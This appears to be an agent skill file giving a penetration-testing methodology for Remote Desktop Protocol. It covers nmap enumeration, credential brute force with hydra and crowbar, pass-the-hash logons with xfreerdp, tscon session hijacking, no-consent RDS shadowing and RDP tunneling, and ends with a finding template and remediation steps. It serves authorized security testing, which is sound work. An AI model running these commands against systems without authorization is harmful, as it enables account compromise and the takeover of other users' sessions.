By name: pentesting-rdp description: Testing the Remote Desktop Protocol (RDP, 3389/tcp ms-wbt-server) during authorized engagements. Covers encryption/NLA fingerprinting and NTLM info with nmap NSE, credential validation and pre/post-auth screenshots with netexec, password brute force (mindful of lockout), pass-the-hash logon with xfreerdp, session hijacking via tscon, RDS shadowing, RDP tunneling, and BlueKeep (CVE-2019-0708) / MS12-020 awareness. domain: cybersecurity subdomain: network-services-pentesting tags:
- penetration-testing
- network-services
- rdp
- windows
- lateral-movement
- session-hijacking version: '1.0' author: xalgorix license: Apache-2.0
Pentesting RDP (port 3389)
When to Use
- During authorized assessments when TCP 3389 (ms-wbt-server) is open
- When fingerprinting the security layer (native RDP, TLS, CredSSP/NLA) and whether NLA is enforced
- When validating recovered credentials or NT hashes against RDP
- When you already hold a foothold and want to hijack or shadow an active session
- When assessing for BlueKeep (CVE-2019-0708) or MS12-020 on legacy hosts
Quick Enumeration
# Encryption, DoS (MS12-020 safe check), and NTLM Windows info
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
# Security layer / NLA fingerprint
nmap --script rdp-enum-encryption -p 3389 <IP>
# netexec quick auth check (reports if NLA is required)
nxc rdp <IP> -u <user> -p <password>
# Pre-auth screenshot (only if NLA is disabled)
nxc rdp <IP> --nla-screenshot
Critical: Checks Most Often Missed
- NLA disabled → pre-auth screenshot — when Network Level Authentication is off, you can grab a login-screen screenshot pre-auth (
nxc rdp <IP> --nla-screenshot), revealing logged-in usernames and host context. - BlueKeep (CVE-2019-0708) — pre-auth wormable RCE on legacy Windows (7/2008 R2 and older) with NLA off. Treat as critical; only exploit with explicit written authorization (the exploit can crash/BSOD the host).
- MS12-020 — RDP DoS / RCE on older hosts. The nmap script checks for it without triggering the DoS.
- Session hijacking via tscon — with SYSTEM, you can attach to any user's existing RDP session without their password (
tscon <ID> /dest:<SESSIONNAME>). - RDS shadowing — if shadowing policy allows, view/control another user's session, sometimes without consent (
mstsc /shadow:<ID> /noconsentprompt /control). - Weak / reused local admin creds + Restricted Admin — pass-the-hash logon via
xfreerdp /pth:when Restricted Admin mode is enabled.
How to CONFIRM: NLA status is confirmed by nmap --script rdp-enum-encryption and nxc rdp output. A valid credential is confirmed when nxc rdp <IP> -u u -p p shows (+)/Pwn3d!. BlueKeep candidacy is indicated by legacy OS + NLA off; confirm only via an authorized, non-destructive checker.
Workflow
Step 1: Enumerate (security layer, NLA, NTLM info)
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
# rdp-ntlm-info leaks: target name, NetBIOS/DNS computer & domain name, OS build
nxc rdp <IP> # banner + NLA requirement
Step 2: Authenticate (validate creds, brute force, PtH)
# Validate a single credential / hash
nxc rdp <IP> -u <user> -p <password>
nxc rdp <IP> -u <user> -H <NTHASH>
rdp_check.py <domain>/<user>:<password>@<IP> # impacket credential check
# Brute force — WARNING: can lock accounts; coordinate with the client
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Password123'
hydra -L usernames.txt -p 'Password123' <IP> rdp
# Interactive logon
xfreerdp /u:<user> /p:<password> /v:<IP> [/d:domain]
xfreerdp /u:<user> /pth:<hash> /v:<IP> [/d:domain] # pass-the-hash (Restricted Admin)
rdesktop -d <domain> -u <user> -p <password> <IP>
Step 3: Post-auth screenshot / verify access
# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot
# Add yourself to the RDP group if you have admin (post-exploitation)
net localgroup "Remote Desktop Users" <user> /add
Step 4: Post-access / lateral movement (hijack, shadow, tunnel)
# Session hijacking with SYSTEM (no password needed)
query user # list sessions + IDs
tscon <ID> /dest:<SESSIONNAME> # take over a session
# mimikatz alternative:
# ts::sessions ; ts::remote /id:2
# RDS shadowing (view/control another session)
qwinsta /server:<IP>
mstsc /v:<IP> /shadow:<SESSION_ID> /control
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt # if policy allows
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow
# Pivot/tunnel TCP over an RDP virtual channel (rdp2tcp)
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp
# Command exec without GUI / automation
# EvilRDP, SharpRDP — run shell/PowerShell, SOCKS proxy, clipboard, file transfer
Key Concepts
| Concept | Description |
|---|---|
| RDP | Microsoft's graphical remote desktop protocol on TCP 3389 |
| NLA (CredSSP) | Network Level Authentication; requires auth before a session is created |
| Security layer | Negotiated as native RDP, TLS, or CredSSP/NLA |
| Restricted Admin mode | Allows pass-the-hash RDP logon without sending a cleartext password |
| Session hijacking (tscon) | Attaching to another user's session as SYSTEM without their password |
| RDS shadowing | Viewing/controlling another user's active session via mstsc |
| BlueKeep (CVE-2019-0708) | Pre-auth wormable RCE in legacy RDP |
| MS12-020 | RDP vulnerability allowing DoS / potential RCE on older hosts |
Tools & Systems
| Tool | Purpose |
|---|---|
| nmap (rdp-* NSE) | Encryption, NLA, NTLM info, MS12-020 check |
| netexec / crackmapexec (rdp) | Credential check, NLA detection, pre/post-auth screenshots |
| xfreerdp / rdesktop | Interactive logon, pass-the-hash, rdp2tcp tunneling |
| impacket rdp_check.py | Validate credentials against RDP |
| crowbar / hydra | RDP brute force (lockout-aware) |
| mstsc / tscon / qwinsta | Native session listing, hijacking, shadowing |
| EvilRDP / SharpRDP | Automated command execution and clipboard/file abuse over RDP |
Common Scenarios
Scenario 1: NLA Disabled Recon
nxc rdp <IP> --nla-screenshot captures the login screen pre-auth, revealing the logged-in user and domain, which informs targeted credential attacks.
Scenario 2: Pass-the-Hash Logon
A recovered local admin NT hash works with xfreerdp /pth: because Restricted Admin mode is enabled, granting an interactive desktop without cracking the password.
Scenario 3: Session Hijacking
After gaining SYSTEM on a jump host, query user shows a Domain Admin's disconnected session; tscon <ID> /dest:rdp-tcp#0 takes it over, inheriting their privileges.
Scenario 4: BlueKeep Exposure
rdp-ntlm-info shows Windows 2008 R2 with NLA off. The host is flagged as a critical BlueKeep candidate and reported; exploitation proceeds only with written authorization on a maintenance window.
Output Format
## RDP Finding
**Service**: Remote Desktop Protocol
**Severity**: <Critical|High|Medium>
**Host**: <IP>:3389
**NLA**: <enabled|disabled> **OS**: <from rdp-ntlm-info>
### Summary
<What was found: weak creds, NLA off, BlueKeep candidate, session hijack, shadowing>
### Evidence
- Command: <nmap / nxc / xfreerdp>
- Output: <NLA status, (+)/Pwn3d!, screenshot path, vuln verdict>
### Access Obtained
| Method | Result |
|--------|--------|
| xfreerdp PtH | interactive desktop as <user> |
| tscon hijack | inherited <DomainAdmin> session |
### Recommendation
1. Require Network Level Authentication (NLA) on all RDP hosts
2. Patch BlueKeep (CVE-2019-0708) and MS12-020; decommission legacy OS
3. Restrict RDP to VPN/jump hosts and enforce MFA
4. Disable RDS shadowing without consent; audit shadow policy
5. Enforce strong, unique credentials and account lockout thresholds